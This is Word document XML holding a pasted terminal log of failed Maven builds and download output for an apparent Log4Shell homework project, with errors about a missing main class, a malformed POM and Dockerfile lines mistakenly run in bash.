    <w:p w14:paraId="442DFF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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9CC8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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar (20 kB at 101 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14173C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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C062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https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.jar (338 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D34D96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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8589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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.jar (335 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103823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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7599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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.jar (1.7 MB at 7.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525A99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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7B9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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.jar (250 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAE3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD67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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.jar (61 kB at 269 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43D1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9629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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.jar (52 kB at 228 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A901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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE48C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar (154 kB at 659 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA32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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106AE53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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar (42 kB at 170 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE92B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B8A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar (25 kB at 101 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CD6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BED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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar (42 kB at 166 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D3B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213056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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar (60 kB at 221 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3AF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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CA5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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar (4.2 kB at 16 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A962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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E0D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar (62 kB at 226 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C8D16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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E151C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar (160 kB at 582 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF9F9A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB6F9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.jar (557 kB at 2.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2480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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C719B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.jar (47 kB at 156 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D767D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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C130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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.jar (53 kB at 168 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6489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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0737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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar (197 kB at 616 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F060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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB9C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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar (291 kB at 891 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC3A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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50C1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.jar (262 kB at 798 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B143F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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6CD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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.jar (134 kB at 410 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4F9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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15015F3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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.jar (26 kB at 77 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE25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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF25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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.jar (72 kB at 201 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B768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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E250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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.jar (53 kB at 147 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F05D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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012DD8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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.jar (122 kB at 339 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDED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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA84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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.jar (120 kB at 333 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1CE3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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58443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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.jar (33 kB at 88 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E957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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.jar (37 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF84C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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACB6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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E358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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.jar (85 kB at 215 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C119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https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F00B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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.jar (180 kB at 455 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6D9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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FABB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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar (4.6 kB at 11 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76078CD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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2307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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar (305 kB at 744 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F995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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4B4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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.jar (5.9 kB at 14 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF74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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0DF37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https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar (2.2 kB at 5.2 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B42AE6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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.jar (14 kB at 32 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482924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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar (8.8 kB at 20 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5996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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.jar (500 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E38C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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.jar (2.6 MB at 5.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491D5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79A749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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1AE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1E4FC0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Total time:  18.215 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485FB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Finished at: 2025-05-28T23:10:41Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530756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5B8F358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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004AC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6E5955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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74259A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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A61E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3CEF34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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD063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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B57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ls target/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB04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log4shell-demo-0.0.1-SNAPSHOT.jar  log4shell-demo-0.0.1-SNAPSHOT.jar.original  maven-archiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595BA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log4shell-homework-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EC8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-bash: log4shell-homework-0.0.1-SNAPSHOT.jar: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1CAF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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D911D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132C0C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[ERROR] Some problems were encountered while processing the POMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8B7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Malformed POM /home/ec2-user/log4shell-homework/pom.xml: Expected root element 'project' but found 'build' (position: START_TAG seen &lt;build&gt;... @1:7)  @ /home/ec2-user/log4shell-homework/pom.xml, line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1817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'modelVersion' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C125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[FATAL] 'groupId' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3979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[FATAL] 'artifactId' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C1D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[FATAL] 'version' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D06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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B2C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The build could not read 1 project -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190194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6CA1120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The project [unknown-group-id]:[unknown-artifact-id]:[unknown-version] (/home/ec2-user/log4shell-homework/pom.xml) has 5 errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3D41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Malformed POM /home/ec2-user/log4shell-homework/pom.xml: Expected root element 'project' but found 'build' (position: START_TAG seen &lt;build&gt;... @1:7)  @ /home/ec2-user/log4shell-homework/pom.xml, line 1, column 7 -&gt; [Help 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08A2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'modelVersion' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35455D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'groupId' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132E2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'artifactId' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825B9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'version' is missing. @ line 1, column 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A459E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1BD0DE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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F339B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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA34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38B9A7E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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B9A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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/ProjectBuildingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23EE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[Help 2] http://cwiki.apache.org/confluence/display/MAVEN/ModelParseException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198989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FROM openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78FE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-bash: FROM: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD28F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COPY target/log4shell-demo-0.0.1-SNAPSHOT.jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8D0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-bash: COPY: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545504F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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB5D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354124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[ERROR] Some problems were encountered while processing the POMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F14A7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[WARNING] 'build.plugins.plugin.version' for org.springframework.boot:spring-boot-maven-plugin is missing. @ line 38, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C60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'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter-web:jar is missing. @ line 22, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85A04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[ERROR] 'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter:jar is missing. @ line 26, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6308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'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter-logging:jar is missing. @ line 30, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4369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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DEF6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The build could not read 1 project -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414500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0F340B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The project com.example:log4shell-demo:0.0.1-SNAPSHOT (/home/ec2-user/log4shell-homework/pom.xml) has 3 errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA170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'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter-web:jar is missing. @ line 22, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B39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'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter:jar is missing. @ line 26, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727ED3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'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter-logging:jar is missing. @ line 30, column 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06871A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080C81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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DEC7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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0757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01C678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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C50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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/ProjectBuildingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118996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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A12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0E4FF5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2C779C3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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B14D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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4409B2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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431115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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.5/maven-clean-plugin-2.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164D4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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.5/maven-clean-plugin-2.5.pom (3.9 kB at 9.4 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CFF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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/22/maven-plugins-22.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032565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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/22/maven-plugins-22.pom (13 kB at 256 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2F0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/21/maven-parent-21.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80DD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/21/maven-parent-21.pom (26 kB at 462 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0F3E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https://repo.maven.apache.org/maven2/org/apache/apache/10/apache-10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02289E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https://repo.maven.apache.org/maven2/org/apache/apache/10/apache-10.pom (15 kB at 423 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52DB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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.5/maven-clean-plugin-2.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6E1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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.5/maven-clean-plugin-2.5.jar (25 kB at 724 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD610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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B364D7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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom (8.1 kB at 239 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47530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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/23/maven-plugins-23.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A252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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/23/maven-plugins-23.pom (9.2 kB at 317 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80977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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3ECC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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.jar (30 kB at 798 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07354D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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.1/maven-compiler-plugin-3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC55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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.1/maven-compiler-plugin-3.1.pom (10 kB at 378 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA20C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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/24/maven-plugins-24.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFFA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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/24/maven-plugins-24.pom (11 kB at 349 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C883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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.1/maven-compiler-plugin-3.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E685D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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.1/maven-compiler-plugin-3.1.jar (43 kB at 877 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C76A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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.12.4/maven-surefire-plugin-2.12.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DD77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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.12.4/maven-surefire-plugin-2.12.4.pom (10 kB at 327 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624ED83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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.12.4/surefire-2.12.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C907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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.12.4/surefire-2.12.4.pom (14 kB at 383 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3847F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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.12.4/maven-surefire-plugin-2.12.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CEF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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.12.4/maven-surefire-plugin-2.12.4.jar (30 kB at 846 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E9DA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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/2.4/maven-jar-plugin-2.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6799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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/2.4/maven-jar-plugin-2.4.pom (5.8 kB at 224 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F716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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/2.4/maven-jar-plugin-2.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EDB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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/2.4/maven-jar-plugin-2.4.jar (34 kB at 851 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B4E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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.25/slf4j-api-1.7.25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417AA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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.25/slf4j-api-1.7.25.pom (3.8 kB at 142 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB8C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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.25/slf4j-parent-1.7.25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4473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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.25/slf4j-parent-1.7.25.pom (14 kB at 500 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100713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A8EA0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maven-clean-plugin:2.5:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
